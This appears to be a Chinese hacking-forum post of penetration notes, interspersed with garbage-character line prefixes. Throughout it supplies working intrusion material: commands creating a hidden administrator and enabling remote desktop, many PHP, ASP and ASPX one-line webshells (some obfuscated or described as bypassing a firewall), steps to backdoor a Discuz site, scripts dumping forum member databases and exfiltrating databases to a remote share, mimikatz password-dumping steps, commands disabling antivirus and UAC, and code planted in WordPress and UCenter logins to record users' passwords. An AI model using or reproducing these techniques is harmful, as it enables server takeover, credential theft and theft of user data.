4 d6 h/ k, y) t$ ~
<Connection File> -- 指定连接的 .rdp 文件的名称。

/v:<server[:port]> -- 指定要连接到的终端服务器。

/console -- 连接到服务器的控制台会话。
% B6 Z! s( r0 N" ?  ~
/f -- 以全屏模式启动客户端。

6 U; r+ i1 H0 T( U( E+ g  Y/w:<width> --  指定远程桌面屏幕的宽度。

/h:<height> -- 指定远程桌面屏幕的高度。
; l( ^+ `. W7 h( Q3 J
1 j  @. h0 N% @8 u, z+ z/edit -- 打开指定的 .rdp 文件来编辑。

/migrate -- 将客户端连接管理器创建的旧版
3 C* Y! ]7 O- j$ k/ g$ r! y连接文件迁移到新的 .rdp 连接文件。
3 A* b9 m' d9 }) X

其中mstsc /console连接的是session 0，而mstsc是另外打开一个虚拟的session，这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊，有的时候用得着的，特别是一些软件就
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
! M: [! e( l  ~
命令行下开启3389
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
0 T3 @( Z( g  f+ f; qnet localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
1 ^- y# ^# v( q8 E1 K0 U4 Techo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
/ J  @! P$ n/ h; M$ G: _: iecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
$ E/ T& g6 M# S7 K, B, \# isc config remoteaccess start= auto
0 P) K1 C( ^1 G2 V$ pnet start rasman
* _4 q' V5 Q6 T$ |9 @) Mnet start remoteaccess
Media
<form id="frmUpload" enctype="multipart/form-data"
9 M- j' b  F3 U/ u6 j8 S- qaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
4 S+ Y* d# |$ \2 v<input id="btnUpload" type="submit" value="Upload">
! W: R4 D' t' h5 x7 v+ K" V  n</form>

control userpasswords2 查看用户的密码
& L4 A. q" j1 B, p/ T7 b# waccess数据库直接导出为shell，前提a表在access中存在。知道网站的真实路径
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

141、平时手工MSSQL注入的时候如果不能反弹写入，那么大多数都是把记录一条一条读出来，这样太累了，这里给出1条语句能读出所有数据:
测试1：
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

测试2：

) |6 H+ \& ]& kcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
5 x! R# `  U( u1 b9 R; R
; G% J# U+ z, I- F, @delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
- ^  `" g, b+ e$ A
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
. ]8 e; u5 C: w7 ^关闭macfee软件的方法：//需要system权限，请使用at或psexec –s cmd.exe命令
可以上传.com类型的文件，如nc.com来绕过macfee可执行限制；
net stop mcafeeframework
  x& O: g' h" g/ y! [net stop mcshield
net stop mcafeeengineservice
, J- z% q2 v$ d0 Vnet stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D

4 o- C" H& E# d* U: \  VNCDump.zip (4.76 KB, 下载次数: 1)
5 m& |% A7 C* Z& Z密码在线破解http://tools88.com/safe/vnc.php
' `/ x% U& y* {. `VNC密码可以通过vncdump 直接获取，通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
& X: u$ i8 c, ]8 P
exec master..xp_cmdshell 'net user'
) e0 A, r( k$ l, O1 B" h8 ]mssql执行命令。
获取mssql的密码hash查询
2 ^4 N' @1 ?- d5 B; {* Wselect name,password from master.dbo.sysxlogins
( x0 s+ v7 e- d: h5 n- \  I  {5 ^7 o
backup log dbName with NO_LOG;
% t( ]4 ]$ e0 f) x# k8 ?0 K$ [backup log dbName with TRUNCATE_ONLY;
+ ~2 K) ]% [. k! J- uDBCC SHRINKDATABASE(dbName);
mssql数据库压缩

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
将game_db_201107170400.BAK文件压缩为1.rar，大小为200M的分卷文件。
8 w; a: I) X# L
- e0 u, `4 f( t2 R* ^backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
备份game数据库为game.bak，路径为D:\WebSites\game.com\UpFileList\game.bak

1 O' S; {0 M8 k" r  k6 UDiscuz！nt35渗透要点：
8 {# L2 x) v: a5 \4 e（1）访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
4 t/ X! T6 C3 V3 T' A4 l: M（2）打开rss.aspx文件，将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份，然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
（3）保存。
# f5 U- R" [( T" D3 @（4）一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
d:\rar.exe a -r d:\1.rar d:\website\
递归压缩website
  I, t1 q/ l' d  G3 D注意rar.exe的路径

3 t/ h+ x9 P( w<?php

. S1 V5 r' L5 p+ d' `" w( {+ h$telok   = "0${@eval($_POST[xxoo])}";

+ t, U# q2 b# a2 N1 r. j5 g$username   = "123456";
4 T3 t% j. k3 w2 N/ e+ @
$userpwd   = "123456";

$telhao   = "123456";

9 v( ?- A9 _6 x9 ?$telinfo   = "123456";
" Q6 @' i8 m5 [) z1 G7 H! U
?>
php一句话未过滤插入一句话木马

. o; D% g( @; n6 x站库分离脱裤技巧
/ |. y9 }1 |) lexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
( n' }1 y% b# k9 l& j% ^; Uexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
条件限制写不了大马，只有一个一句话，其实要实现什么完全够了，只是很不直观方便啊，比如tuo库。
0 k5 t5 n+ S: b9 L, H! X& y. w# R这儿利用的是马儿的专家模式（自己写代码）。
9 I4 N" m3 ?- Lini_set('display_errors', 1);
* Q- J3 Z' g' yset_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
+ P( L$ \% @  z+ a3 c0 A, U$ z5 W$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
2 K0 y# O4 {, w3 h5 m$i = 0;
* R, C( [5 q6 y% b5 q; Y$tmp = '';
: R1 u9 q3 T$ W& r+ ^+ Pwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
9 O- g3 m" ^7 H% q: p7 t5 e% [    $i = $i+1;
( U9 @5 ^1 j- B. w+ T: v: H! V    $tmp .=  implode("::", $row)."\n";
    if(!($i%500)){//500条写入一个文件
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
/ t+ X' v3 z) E8 z& G0 ^6 `        file_put_contents($filename,$tmp);
        $tmp = '';
' A* d% \, \3 J$ N6 T  p    }
}
$ j" t& }7 B0 g! s/ U& @# ?mysql_free_result($result);

( U: u5 K) B6 l# f6 u
# E5 G& {' |& `) j" C
//down完后delete
: X3 O$ _+ ^1 d9 B% _

ini_set('display_errors', 1);
error_reporting(E_ALL);
, D! w/ G# ^2 o  w( N8 o$i = 0;
while($i<32) {
    $i = $i+1;
) J$ h8 |% Y+ J; v        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
2 N) [& G/ a5 R; q        unlink($filename);
# o2 e6 m' Y8 k  D( U1 X/ D}
httprint 收集操作系统指纹
扫描192.168.1.100的所有端口
7 p+ v* }' w: m6 gnmap –PN –sT –sV –p0-65535 192.168.1.100
host -t ns www.owasp.org 识别的名称服务器，获取dns信息
8 Y$ j% g7 R! N  x; g; A7 P: Phost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
Netcraft的DNS搜索服务，地址http://searchdns.netcraft.com/?host

Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
# U& K3 N, x: Z( {2 q
　　MSN search: http://search.msn.com 语法： "ip:x.x.x.x" (没有引号)

　　Webhosting info: http://whois.webhosting.info/ 语法： http://whois.webhosting.info/x.x.x.x

! j  w" I. L" a1 ]0 F　　DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
( Q5 ~" }  F- S. Y' [" y
5 ^% s8 S0 Y6 M8 j  J　　http://net-square.com/msnpawn/index.shtml (要求安装)
0 x* T* i7 V) e( c6 y" L9 x! D2 r
　　tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
9 f8 o6 O( J. z6 m. P1 A
  ^6 I, B1 t' K, L/ [2 I　　SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
; I  \% N, Z. i$ U2 r# Nset names gb2312
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。

( Z, O) \% H9 w: ?; j7 p' wmysql 密码修改
" J$ V. P) B$ n& G0 o$ m! \UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
6 u6 }1 Q+ [2 l3 Vupdate user set password=PASSWORD('antian365.com') where user='root';
1 G- b" V& u7 B, q# f0 k+ P1 W2 wflush privileges;
高级的PHP一句话木马后门
$ Y3 v; S: ~) L' S4 S
& `" r3 a* t, j& i; T( t3 V2 e: k入侵过程发现很多高级的PHP一句话木马。记录下来，以后可以根据关键字查杀

1、

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$hh("/[discuz]/e",$_POST['h'],"Access");

7 T/ A" R' e, S. w: e8 x//菜刀一句话
: A- q  J. ]3 k) d! P: P& W
  [/ Q- }; P4 f$ V+ j  W2、

) @. E; n, e8 y$filename=$_GET['xbid'];
4 W- e  y$ S: G8 M1 z, S
% f8 [& z# H7 g; X& Linclude ($filename);

/ H3 u  P! b9 C1 v8 W//危险的include函数，直接编译任何文件为php格式运行

3、

5 o# O" p4 X$ Q8 A+ J6 x  x$reg="c"."o"."p"."y";
3 n% m+ ?  g; O" k; x
- t5 g8 J( r( D. n# e$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
; j% ^- s  h( r- R& G, t
7 q/ I+ r( `. z8 `$ N//重命名任何文件
: M) x, y; D6 L% g& l- Y; ?
- y* ]& N& g% Q- M' [* k4、
; u- |$ i; Y: x. w; ~7 m' @4 @$ ^
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
* a; S. b' f% d" ^1 a
$gzid("/[discuz]/e",$_POST['h'],"Access");

  p/ }# F& L* k& y, m6 K5 s; m//菜刀一句话
7 [- F4 M" `8 f( W% `, u
5、include ($uid);
. T; n- F$ N7 l5 J2 I
* H9 a! T' O$ v1 a! ]0 l0 o& h0 `//危险的include函数，直接编译任何文件为php格式运行，POST
3 d5 ~! C. T' v7 \0 a/ v
: Y. `  \! R. O  Q
5 D; r& Y' q8 s* Y//gif插一句话

6、典型一句话

$ A7 V! {6 r) a( O8 T, b6 h程序后门代码
<?php eval_r($_POST[sb])?>
程序代码
<?php @eval_r($_POST[sb])?>
1 J- b! d9 a) U! Q//容错代码
9 ^% J! P  i4 B7 Z- D6 I程序代码
<?php assert($_POST[sb]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句
" n& Y( X/ p6 r程序代码
<?$_POST['sa']($_POST['sb']);?>
( l! J4 c% e( ?. F. ^程序代码
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
; w( e% R4 o' X( O@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
( }+ D* Z* O( Q9 x7 X程序代码
4 G/ ~; y! ]8 \7 N<O>h=@eval_r($_POST[c]);</O>
程序代码
<script language="php">@eval_r($_POST[sb])</script>
0 O& k2 a: V9 f% A. J' ~) J//绕过<?限制的一句话
4 r2 e8 j2 q# [" I
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
) s  o; w, Z# `9 z- ?& [: M' h4 B详细用法：
1、到tools目录。psexec \\127.0.0.1 cmd
2、执行mimikatz
3、执行 privilege::debug
% x" S0 t! l+ l) k9 D4、执行 inject::process lsass.exe sekurlsa.dll
5 [: F1 X- G5 s2 S! d# k5、执行@getLogonPasswords
6、widget就是密码
9 F& r" R& h( ^4 h! J9 Q. G7、exit退出，不要直接关闭否则系统会崩溃。

http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
5 t5 a: I; O( n6 w% C
3 |- \, V: A- m: F& B4 r/ q# v4 O自动查找系统高危补丁
& c6 x& n% O* y/ k% |& n# M8 csysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
! ~5 F; Y4 w+ o1 [" L  e5 _  d
突破安全狗的一句话aspx后门
<%@ Page Language="C#" ValidateRequest="false" %>
4 d! v8 U+ }& e! q, j2 X+ I<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
webshell下记录WordPress登陆密码
0 V  {" v( f/ k# iwebshell下记录Wordpress登陆密码方便进一步社工
& O- V' u; I4 @$ s在文件wp-login.php中539行处添加：
! ?; G% m8 n9 L// log password
7 e7 @% X( Q7 a: V$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
% y; I7 k; Y+ }9 \$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
& r% `5 B/ t" r" W, Y- y$txt=$txt.”\r\n”;
: O) c& M0 ^0 e* F5 h0 M% [& [if($log_user&&$log_pwd&&$log_ip){
( H, t7 Q" d5 j' y& G: }2 \@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
8 J. J3 m9 a, V+ u. I6 `4 |}
当action=login的时候会触发记录密码code，当然了你也可以在switch…case..语句中的default中写该代码。
就是搜索case ‘login’
在它下面直接插入即可，记录的密码生成在pwd.txt中，
! T. B" ^  S" z9 D8 b其实修改wp-login.php不是个好办法。容易被发现，还有其他的方法的，做个记录
* t# ^* n9 J2 R利用II6文件解析漏洞绕过安全狗代码：
" E' O' X5 L: e. b& b) a;antian365.asp;antian365.jpg

4 F6 _7 ^& o& \' n各种类型数据库抓HASH破解最高权限密码！
1.sql server2000
7 e- d1 o. ]% R4 rSELECT password from master.dbo.sysxlogins where name='sa'
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

+ F2 b( @' B& }, Q- Y0×0100- constant header
34767D5C- salt
9 H& [: s3 S. a. u0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
2 ^! f8 x5 y3 N  f; x" I: f: \SQL server 2005:-
5 Q7 n7 k$ n+ ~5 l9 r+ GSELECT password_hash FROM sys.sql_logins where name='sa'
! `  R1 G! t) L* p+ X% N" O" U$ U0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
+ O7 ]  z1 O6 H8 V6 U  m0×0100- constant header
993BF231-salt
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
  D7 R; f8 _, `1 `crack case sensitive hash in cain, try brute force and dictionary based attacks.

update:- following bernardo’s comments:-
" [: ^, E+ ~9 t8 R  Guse function fn_varbintohexstr() to cast password in a hex string.
6 |# n9 k3 r; J7 de.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins

. e: H: j* i2 ]3 s9 s# h( z  GMYSQL:-

In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

; s7 G3 d6 p+ G( C, g' m& I*mysql  < 4.1

mysql> SELECT PASSWORD(‘mypass’);
+——————–+
| PASSWORD(‘mypass’) |
# Y3 m% z% T0 @4 J; H+——————–+
| 6f8c114b58f2ce9e   |
) W3 u0 w* s$ a- ?+——————–+
+ }0 U+ r: d" o* b9 r$ \& ?& ]
*mysql >=4.1

1 W% Z5 m# U  Kmysql> SELECT PASSWORD(‘mypass’);
+——————————————-+
; k( u4 K" U  v9 U1 T$ V& J| PASSWORD(‘mypass’)                        |
+——————————————-+
/ c! D5 `8 b$ @| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+——————————————-+
% w) n& m# _" A* h8 }
Select user, password from mysql.user
The hashes can be cracked in ‘cain and abel’

0 J3 y* o; g+ V3 jPostgres:-
5 b2 i; B4 X. M8 r2 Z! `Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
0 i+ P- q: |2 U2 `  c, cselect usename, passwd from pg_shadow;
3 U/ ~. T. W: u7 z( c& O0 Pusename      |  passwd
——————+————————————-
- \5 g3 U5 ?* V. U$ F, htestuser            | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
6 Q/ M* t* H. L) A. B$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
More on Oracle later, i am a bit bored….
: v3 Z* m. k# }; \+ `0 B* ]7 Q1 o
8 v, [4 q1 W4 O$ t' I: w) Q, {
在sql server2005/2008中开启xp_cmdshell
/ V, A' G7 W! e4 [0 v% [( k! S5 u-- To allow advanced options to be changed.
) A4 u/ X3 W3 M# C  }EXEC sp_configure 'show advanced options', 1
GO
) F# r! S! E2 g; W  \4 h-- To update the currently configured value for advanced options.
RECONFIGURE
( T5 S% c9 v4 z) B+ B, {. q3 |6 h1 eGO
% R% y# D9 \: n" M. @! K* F. l' ]-- To enable the feature.
- F6 _* ^1 Y- S" X( _3 R* B. AEXEC sp_configure 'xp_cmdshell', 1
GO
" S+ m& _: g1 B) m: q-- To update the currently configured value for this feature.
RECONFIGURE
GO
5 P) N  G% D' HSQL 2008 server日志清除，在清楚前一定要备份。
& Y/ ?3 {' B3 {2 X6 X6 o如果Windows Server 2008 标准版安装SQL Express 2008，则在这里删除：
4 k" ~  `0 R( {" v7 B$ hＸ:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
4 k  V  c, |$ ]7 ~
对于SQL Server 2008以前的版本：
6 N  d, x" r* x: F3 KSQL Server 2005:
! z7 G, G- {* I, C) A删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
! w, j' e" e4 c7 `6 G清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。

本帖最后由 simeon 于 2013-1-3 09:51 编辑

8 t# E/ l% u! z
windows 2008 文件权限修改
! f8 R/ A  W9 V8 L, V1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
6 h! H2 N3 c# z2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
. }" p* u9 B2 Q0 K$ z% ^一、先在右键菜单里面看看有没有“管理员取得所有权”，没有“管理员取得所有权”，

3 T% Y; _' R* q5 cWindows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
! }1 p0 p3 i; g6 i@="管理员取得所有权"
0 S4 d  ]- A5 }"NoWorkingDirectory"=""
0 K! w7 C: V) h[HKEY_CLASSES_ROOT\*\shell\runas\command]
. k1 `) G/ C* B/ N& d@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
! C' E6 {7 |/ P4 n"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
2 o- M/ ^) b# V@="管理员取得所有权"
8 M9 p2 V" i  f% _* O"NoWorkingDirectory"=""
# q1 e2 W2 |+ ^) w# u) w[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
8 b# e( i$ e) T& }"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
  P' g$ L9 I& y9 k! @7 {" W"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

! h' E* v4 ], j
win7右键“管理员取得所有权”.reg导入
5 m- Q4 v: @* ^( Q) \  U' t二、在C:\Windows目录里下搜索“notepad.exe”文件，应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”，
1、C:\Windows这个路径的“notepad.exe”不需要替换
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
( n. j6 G; `/ j' d0 j) ]3、四个“notepad.exe.mui”不要管
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
- w; G. f' q$ ~. ^$ sC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
. k7 n2 Y- z" S. j; ?* r/ d替换方法先取得这两个文件夹的管理员权限，然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面，
替换完之后回到桌面，新建一个txt文档打开看看是不是变了。
windows 2008中关闭安全策略：
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
修改uc_client目录下的client.php 在
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为：falw
' S) h( h* Z3 g1 Z9 G  uif(getenv('HTTP_CLIENT_IP')) {
" m9 @* S* C- {* _; H$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
6 A9 {( o( ?& g! }, _* V$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
8 k  ~/ b1 w& j: E6 f$onlineip = getenv('REMOTE_ADDR');
} else {
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
# B' [$ z# E, [' D5 r4 f     $showtime=date("Y-m-d H:i:s");
% T0 O1 l, W6 ~9 J; Z* s2 o4 I    $record="<?exit();?>用户：".$username." 密码：".$password." IP:".$onlineip." Time:".$showtime."\r\n";
) {9 L/ d  ]/ O    $handle=fopen('./data/cache/csslog.php','a+');
    $write=fwrite($handle,$record);

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2